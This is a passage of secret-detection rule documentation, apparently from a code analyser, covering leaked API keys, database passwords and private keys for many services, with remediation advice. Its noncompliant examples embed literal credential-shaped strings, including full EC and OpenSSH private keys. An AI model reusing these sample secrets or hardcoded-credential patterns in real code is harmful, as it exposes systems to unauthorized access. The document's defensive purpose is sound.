Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

url = "http://api.openweathermap.org/data/2.5/weather?units=imperial&appid=ae73acab47d0fc4b71b634d943b00518&q="

Compliant solution

import os
token = os.environ["OW_TOKEN"]

url = f"http://api.openweathermap.org/data/2.5/weather?units=imperial&appid={token}&q="

Resources

Standards

Documentation

OpenWeather Documentation - API keys

secrets:S6704

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Riot API keys are used to access the Riot Games API, which provides developers with programmatic access to various data and services related to Riot Games' products, such as League of Legends. These API keys are used to authenticate and authorize requests made to the API, allowing developers to retrieve game data, player statistics, match history, and other related information.

If a Riot API key is leaked to an unintended audience, it can have significant consequences. One of the main risks is unauthorized access. The unintended audience may exploit the leaked API key to gain entry to the Riot Games API. This can result in the unauthorized retrieval of sensitive data and misuse of services provided by the API. It poses a serious security threat as it allows individuals to access information that they should not have access to, potentially compromising the privacy and integrity of the data.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other usages of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("api_key", "RGAPI-924549e3-31a9-406e-9e92-25ed41206dce")

Compliant solution

props.set("api_key", System.getenv("API_KEY"))

Resources

Standards

secrets:S6706

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A cryptographic private key is a piece of sensitive information used in asymmetric cryptography. Private keys are used in conjunction with public keys to secure communications and authenticate digital signatures.

Private keys can be used to perform two main cryptographic operations, encryption and digital signature. Those operations are the basis of multiple higher-level security mechanisms such as:

  • User authentication
  • Server authentication, for example in the X.509 trust model
  • E-mail encryption

Disclosing a cryptographic private key to an unintended audience can have severe security consequences. The exact impact will vary depending on the role of the key and the assets it protects.

For example, if the key is used in conjunction with an X.509 certificate to authenticate a web server as part of TLS communications, attackers will be able to impersonate that server. This leads to man-in-the-middle attacks that would affect both the confidentiality and integrity of communications between clients and that server.

If the key was used as part of e-mail protocols, attackers might be able to send e-mails on behalf of the key owner or decrypt previously encrypted emails. This might lead to sensitive information disclosure and reputation loss.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

In most cases, if the key is used as part of a larger trust model (X.509, PGP, etc.), it is necessary to issue and publish a revocation certificate. Doing so will ensure that all people and assets that rely on this key for security operations are aware of its compromise and stop trusting it.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

private_key = "-----BEGIN EC PRIVATE KEY-----" \
    "MF8CAQEEGEfVxjrMPigNhGP6DqH6DPeUZPbaoaCCXaAKBggqhkjOPQMBAaE0AzIA" \
    "BCIxho34upZyXDi/AUy/TBisGeh4yKJN7pit9Z+nKs4QajVy97X8W9JdySlbWeRt" \
    "2w==" \
    "-----END EC PRIVATE KEY-----"

Compliant solution

with open("/path/to/private.key","r") as key_file:
    private_key = key_file.read()

Resources

Standards

secrets:S6684

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Azure Subscription Keys are used to authenticate and authorize access to Azure resources and services. These keys are unique identifiers that are associated with an Azure subscription and are used to control access to resources such as virtual machines, storage accounts, and databases. Subscription keys are typically used in API requests to Azure services, and they help ensure that only authorized users and applications can access and modify resources within an Azure subscription.

If an Azure Subscription Key is leaked to an unintended audience, it can pose a significant security risk to the Azure subscription and the resources it contains. An attacker who gains access to a subscription key can use it to authenticate and access resources within the subscription, potentially causing data breaches, data loss, or other malicious activities.

Depending on the level of access granted by the subscription key, an attacker could potentially create, modify, or delete resources within the subscription, or even take control of the entire subscription. This could result in significant financial losses, reputational damage, and legal liabilities for the organization that owns the subscription.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Microsoft Azure provides an activity log that can be used to audit access to the API.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("subscription_key", "efbb1a98f026d061464af685cd16dcd3")

Compliant solution

props.set("subscription_key", System.getenv("SUBSCRIPTION_KEY"))

Resources

Standards

Documentation

secrets:S6338

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Azure Storage Account Keys are used to authenticate and authorize access to Azure Storage resources, such as blobs, queues, tables, and files. These keys are used to authenticate requests made against the storage account.

If an Azure Storage Account Key is leaked to an unintended audience, it can pose a significant security risk to your Azure Storage account.

An attacker with access to your storage account key can potentially access and modify all the data stored in your storage account. They can also create new resources, delete existing ones, and perform other actions that can compromise the integrity and confidentiality of your data.

In addition, an attacker with access to your storage account key can also incur charges on your account by creating and using resources, which can result in unexpected billing charges.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("storage_key", "4dVw+l0W8My+FwuZ08dWXn+gHxcmBtS7esLAQSrm6/Om3jeyUKKGMkfAh38kWZlItThQYsg31v23A0w/uVP4pg==")

Compliant solution

props.set("storage_key", System.getenv("STORAGE_KEY"))

Resources

Standards

Documentation

secrets:S6337

Why is this an issue?

IBM API keys are used to authenticate applications that consume IBM Cloud APIs.

If your application interacts with IBM then it requires credentials to access all the resources it needs to function properly. Resources that can be accessed depend on the permissions granted to the account. These credentials may authenticate a user who has unrestricted access to all resources in your account, including billing information.

Recommended Secure Coding Practices

Only administrators should have access to the IBM API keys used by your application.

As a consequence, IBM API keys should not be stored along with the application code as they could be disclosed to a large audience or could be made public.

IBM API keys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On IBM Cloud this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

In addition to secure storage, it’s important to apply restrictions to API keys in order to mitigate the impacts when they are discovered by malicious actors.
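
As a minimal sketch of this practice, the key can be read from the environment at startup instead of being hardcoded. The variable name IBM_API_KEY below is an assumption for illustration, not an IBM convention:

```python
import os

def load_api_key(var_name: str = "IBM_API_KEY") -> str:
    """Fetch the API key from the environment; fail fast if it is missing.

    The variable name is hypothetical; use whatever your deployment
    platform or secrets-manager integration provides.
    """
    key = os.environ.get(var_name)
    if not key:
        raise RuntimeError(f"{var_name} is not set")
    return key
```

Failing fast when the variable is absent prevents the application from silently running without credentials.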

Resources

secrets:S6697

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords in MySQL are used to authenticate users against the database engine. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a MySQL password leaks to an unintended audience, it can have serious consequences for the security of your database, the data stored within it and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a MySQL database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the MySQL instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

General-purpose MySQL log files contain information about user authentication. They can be used to audit malicious use of accounts affected by a password leak.
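
A sketch of the relevant server settings (file locations are assumed and distribution-specific):

```
# my.cnf / mysqld.cnf – enable the general query log, which records
# client connections and can support a post-leak audit
[mysqld]
general_log      = 1
general_log_file = /var/log/mysql/general.log
```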

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

uri = "mysql://foouser:foopass@example.com/testdb"

Compliant solution

import os
user = os.environ["MYSQL_USER"]
password = os.environ["MYSQL_PASSWORD"]

uri = f"mysql://{user}:{password}@example.com/testdb"

Resources

Standards

secrets:S6334

Why is this an issue?

Google API keys are used to authenticate applications that consume Google Cloud APIs. They are especially useful for accessing public data anonymously (like Google Maps), and are used to associate API requests with your project for quota and billing.

API keys are not strictly secret as they are often embedded into client side code or mobile applications that consume Google Cloud APIs. Still, they should be secured and should never be treated as public information.

An unrestricted Google API key disclosed in public source code could be used by malicious actors to consume Google APIs on behalf of your application. This has a financial impact, as your organisation will be billed for the data consumed by the malicious actor. If your account has a quota capping the API consumption of your application, this quota can be exceeded, leaving your application unable to request the Google APIs it requires to function properly.

Recommended Secure Coding Practices

Only administrators should have access to the Google API keys used by your application.

As a consequence, Google API keys should not be stored along with the application code as they could be disclosed to a large audience or could be made public.

Google API keys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On Google Cloud this service is called Secret Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

In addition to secure storage, it’s important to apply restrictions to API keys in order to mitigate the impacts when they are discovered by malicious actors.
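
As an illustration of keeping the key out of the repository, it can be read from a file deployed outside the code tree. The path below is hypothetical:

```python
from pathlib import Path

def load_google_api_key(path: str = "/etc/myapp/google_api_key") -> str:
    """Read the API key from a file that is never committed to the repo.

    The default path is illustrative only; restrict its permissions so
    that only the application user can read it.
    """
    return Path(path).read_text(encoding="utf-8").strip()
```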

Resources

secrets:S6696

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

SendGrid keys are used for authentication and authorization when using the SendGrid email delivery service.

If a SendGrid key were to accidentally fall into the hands of unintended recipients, it could have severe repercussions for your email delivery.

Firstly, unauthorized individuals who gain access to your SendGrid account could exploit its features to send emails on your behalf. This unauthorized access might result in the sending of spam emails, phishing attempts, or other forms of unsolicited and potentially harmful content. This not only compromises the integrity of your email communications but also poses a risk to the recipients who may unknowingly engage with malicious messages.

Secondly, the leaked SendGrid key could trigger a high volume of email activity, potentially raising suspicions. SendGrid, being vigilant about such activities, may flag your account and take action against it. This could lead to the suspension or termination of your SendGrid account, disrupting your email delivery service and causing significant inconvenience and potential loss of communication with your customers or clients.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("sg_key", "SG.Wjo5QoWqTmrFtMUf8m2T.CIY0Z24e5sJawIymiK_ZKC_7I15yDP0ur1yt0qtkR9Go")

Compliant solution

props.set("sg_key", System.getenv("SG_KEY"))

Resources

Standards

Documentation

secrets:S6699

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

The Spotify API secret is a confidential key used for authentication and authorization purposes when accessing the Spotify API.

The Spotify API grants applications access to Spotify’s services and, by extension, user data. Should this secret fall into the wrong hands, two immediate concerns arise: unauthorized access to user data and data manipulation.

When unauthorized entities obtain the API secret, they have potential access to users' personal Spotify information. This includes the details of their playlists, saved tracks, and listening history. Such exposure might not only breach personal boundaries but also infringe upon privacy standards set by platforms and regulators.

In addition to simply gaining access, there is the risk of data manipulation. If malicious individuals obtain the secret, they could tamper with user content on Spotify. This includes modifying playlists, deleting beloved tracks, or even adding unsolicited ones. Such actions not only disrupt the user experience but also violate the trust that users have in both Spotify and third-party applications connected to it.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("spotify_secret", "f3fbd32510154334aaf0394aca3ac4c3")

Compliant solution

props.set("spotify_secret", System.getenv("SPOTIFY_SECRET"))

Resources

Standards

secrets:S6336

Why is this an issue?

AccessKeys are long-term credentials designed to authenticate and authorize requests to Alibaba Cloud.

If your application interacts with Alibaba Cloud then it requires AccessKeys to access all the resources it needs to function properly. Resources that can be accessed depend on the permissions granted to the Alibaba Cloud account. These credentials may authenticate to the account root user who has unrestricted access to all resources in your Alibaba Cloud account, including billing information.

This rule flags instances of:

  • Alibaba Cloud AccessKey ID
  • Alibaba Cloud AccessKey secret

Recommended Secure Coding Practices

Only administrators should have access to the AccessKeys used by your application.

As a consequence, AccessKeys should not be stored along with the application code as they would grant special privileges to anyone who has access to the application source code.

AccessKeys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On Alibaba Cloud this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.
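
A minimal sketch, assuming the AccessKey pair is injected through environment variables. The names below follow the convention used by Alibaba Cloud SDKs, but treat them as an assumption:

```python
import os

def load_access_key_pair() -> tuple:
    """Return the AccessKey ID and secret from the environment.

    Raises KeyError if either variable is missing, so a misconfigured
    deployment fails fast instead of running unauthenticated.
    """
    return (
        os.environ["ALIBABA_CLOUD_ACCESS_KEY_ID"],
        os.environ["ALIBABA_CLOUD_ACCESS_KEY_SECRET"],
    )
```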

Resources

secrets:S6698

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords in PostgreSQL are used to authenticate users against the database engine. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a PostgreSQL password leaks to an unintended audience, it can have serious consequences for the security of your database, the data stored within it, and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a PostgreSQL database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the PostgreSQL instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

By default, no connection information is logged by the PostgreSQL server. The log_connections parameter must be enabled in the server configuration for this to happen.
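
The corresponding server setting looks like this (a postgresql.conf sketch; a configuration reload is required for it to take effect):

```
# postgresql.conf – record each attempted connection and the outcome of
# client authentication, enabling a post-leak audit
log_connections = on
```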

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

uri = "postgres://foouser:foopass@example.com/testdb"

Compliant solution

import os

user = os.environ["PG_USER"]
password = os.environ["PG_PASSWORD"]
uri = f"postgres://{user}:{password}@example.com/testdb"

Resources

Standards

Documentation

secrets:S6335

Why is this an issue?

Google Cloud service accounts are designed to authenticate and authorize requests to Google APIs.

If your application interacts with Google Cloud services then it requires a service account to access all the resources it needs to function properly. Resources that can be accessed depend on the permission granted to the service account. Establishing the identity of a service account relies on a public/private key pair. It’s common for private keys to be distributed through a JSON file that your application will then use to consume Google APIs.

A key may authenticate to a high privilege which has unrestricted access to all resources in your Google Cloud project, including billing information.

Recommended Secure Coding Practices

Only administrators should have access to the service account key used by your application.

As a consequence, service account keys should not be stored along with the application code as they would grant special privileges to anyone who has access to the application source code.

Keys should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On Google Cloud this service is called Secret Manager.

When keys are disclosed in the application code, consider them as compromised and revoke them immediately.
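
As a sketch, the JSON key file can be kept outside the repository and located through the GOOGLE_APPLICATION_CREDENTIALS environment variable, which Google client libraries conventionally read. The loader below is illustrative:

```python
import json
import os

def load_service_account_info() -> dict:
    """Load the service account JSON key from a path supplied by the
    environment, keeping the key file itself out of source control."""
    key_path = os.environ["GOOGLE_APPLICATION_CREDENTIALS"]
    with open(key_path, encoding="utf-8") as f:
        return json.load(f)
```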

Resources

secrets:S6290

Why is this an issue?

AWS credentials are designed to authenticate and authorize requests to AWS.

If your application interacts with AWS then it requires AWS credentials to access all the resources it needs to function properly. Resources that can be accessed depend on the permission granted to the AWS account. These credentials may authenticate to the AWS account root user who has unrestricted access to all resources in your AWS account, including billing information.

This rule flags instances of:

  • AWS Secret Access Key
  • AWS Access Key ID
  • AWS Session Token

Recommended Secure Coding Practices

Only administrators should have access to the AWS credentials used by your application.

As a consequence, AWS credentials should not be stored along with the application code as they would grant special privileges to anyone who has access to the application source code.

Credentials should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On AWS this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.
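
A minimal sketch, assuming credentials are provided through the standard AWS environment variables rather than hardcoded; the session token is only present for temporary (STS) credentials:

```python
import os

def load_aws_credentials() -> dict:
    """Assemble AWS credentials from the standard environment variables."""
    return {
        "access_key_id": os.environ["AWS_ACCESS_KEY_ID"],
        "secret_access_key": os.environ["AWS_SECRET_ACCESS_KEY"],
        # Only set for temporary (STS) credentials.
        "session_token": os.environ.get("AWS_SESSION_TOKEN"),
    }
```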

Resources

secrets:S6693

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

SSH private keys are used for authentication and secure communication in SSH (Secure Shell) protocols. They are a form of asymmetric cryptography, where a pair of keys is generated: a private key and a corresponding public key. SSH keys provide a secure and efficient way to authenticate and establish secure connections between clients and servers. They are widely used for remote login, file transfer, and secure remote administration.

When an SSH private key is leaked to an unintended audience, it can have severe consequences for security and confidentiality. One of the primary outcomes is unauthorized access. The unintended audience can exploit the leaked private key to authenticate themselves as the legitimate owner, gaining unauthorized entry to systems, servers, or accounts that accept the key for authentication. This unauthorized access opens the door for various malicious activities, including data breaches, unauthorized modifications, and misuse of sensitive information.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Other uses of the secret will also be impacted when the secret is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. Doing this will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Depending on the information system the key is used to authenticate against, the audit method might change. For example, on Linux systems, the system-wide authentication logs could be used to audit recent connections from an affected account.
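
For example, on Debian-family systems sshd records accepted logins in /var/log/auth.log (path and log format are distribution-dependent). The sketch below filters a sample excerpt for accepted public-key authentications, the way one would filter the real log on an affected host:

```shell
# Write a sample excerpt (illustrative log lines), then filter it for
# public-key logins that used the potentially compromised key.
cat <<'EOF' > /tmp/auth_sample.log
Jan 10 10:00:01 host sshd[123]: Accepted publickey for deploy from 203.0.113.5 port 50000 ssh2
Jan 10 10:05:14 host sshd[456]: Failed password for invalid user admin from 198.51.100.9 port 41234 ssh2
EOF
grep "Accepted publickey" /tmp/auth_sample.log
```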

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

String key = """
    -----BEGIN OPENSSH PRIVATE KEY-----
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
    QyNTUxOQAAACDktj2RM1D2wRTQ0H+YZsFqnAuZrqBNEB4PpJ5xm73nWwAAAJgJVPFECVTx
    RAAAAAtzc2gtZWQyNTUxOQAAACDktj2RM1D2wRTQ0H+YZsFqnAuZrqBNEB4PpJ5xm73nWw
    AAAECQ8Nzp6a1ZJgS3SWh2pMxe90W9tZVDZ+MZT35GjCJK2uS2PZEzUPbBFNDQf5hmwWqc
    C5muoE0QHg+knnGbvedbAAAAFGdhZXRhbmZlcnJ5QFBDLUwwMDc3AQ==
    -----END OPENSSH PRIVATE KEY-----""";

Compliant solution

String key = System.getenv("SSH_KEY");

Resources

Standards

secrets:S6692

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A reCAPTCHA secret key is a unique token that is used to verify the authenticity of reCAPTCHA requests made from an application to the reCAPTCHA service. It is a key component in ensuring that CAPTCHA challenges issued by the application are properly solved and verified.

If a reCAPTCHA secret key leaks to an unintended audience, attackers with access to it can forge CAPTCHA responses without solving the challenges, allowing them to bypass the CAPTCHA verification entirely.

This can lead to an influx of spam submissions, automated attacks, or unauthorized access attempts depending on the feature the CAPTCHA mechanism is intended to protect.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Any other use of the secret will also be impacted when it is revoked.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("recaptcha_secret", "6LcaQa4mAAAAAFvhmzAd2hErGBSt4FC")

Compliant solution

props.set("recaptcha_secret", System.getenv("RECAPTCHA_SECRET"))

Resources

Standards

Documentation

secrets:S6695

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

WeChat application keys are used for authentication and authorization purposes when integrating third-party applications with the WeChat platform.

If a WeChat app key were to leak to an unintended audience, it could have severe consequences for both the app developer and the app users. The unauthorized individuals or malicious actors who gain access to the app key would have the potential to exploit it in various ways.

One of the primary risks is the unauthorized access to sensitive user data associated with the WeChat app. This could include personal information, chat logs, and other private data that users have shared on the platform. The leaked app key could provide a gateway for unauthorized individuals to access and misuse this data, compromising the privacy and security of WeChat users.

Another significant concern is the potential for impersonation and unauthorized actions. With the leaked app key, malicious actors could impersonate the app and perform actions on behalf of the app without proper authorization. This could lead to various security breaches, such as sending spam messages, spreading malware, or conducting phishing attacks on unsuspecting WeChat users.

Furthermore, the leaked app key could enable unauthorized parties to manipulate or disrupt the functionality of the WeChat app. They could tamper with app settings, inject malicious code, or even take control of the app’s user base. Such actions could result in a loss of user trust, service disruptions, and reputational damage for both the app developer and the WeChat platform.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Any other use of the secret will also be impacted when it is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. This will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("secret_key", "40b6b70508b47cbfb4ee39feb617a05a")

Compliant solution

props.set("secret_key", System.getenv("SECRET_KEY"))

Resources

Standards

secrets:S6694

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

Passwords in MongoDB are used to authenticate users against the database engine. They are associated with user accounts that are granted specific permissions over the database and its hosted data.

If a MongoDB password leaks to an unintended audience, it can have serious consequences for the security of your database, the data stored within it, and the applications that rely on it.

Compromise of sensitive data

If the affected service is used to store or process personally identifiable information or other sensitive data, attackers knowing an authentication secret could be able to access it. Depending on the type of data that is compromised, it could lead to privacy violations, identity theft, financial loss, or other negative outcomes.

In most cases, a company suffering a sensitive data compromise will face a reputational loss when the security issue is publicly disclosed.

Security downgrade

Applications relying on a MongoDB database instance can suffer a security downgrade if an access password is leaked to attackers. Depending on the purposes the application uses the database for, consequences can range from low-severity issues, like defacement, to complete compromise.

For example, if the MongoDB instance is used as part of the authentication process of an application, attackers with access to the database will likely be able to bypass this security mechanism.

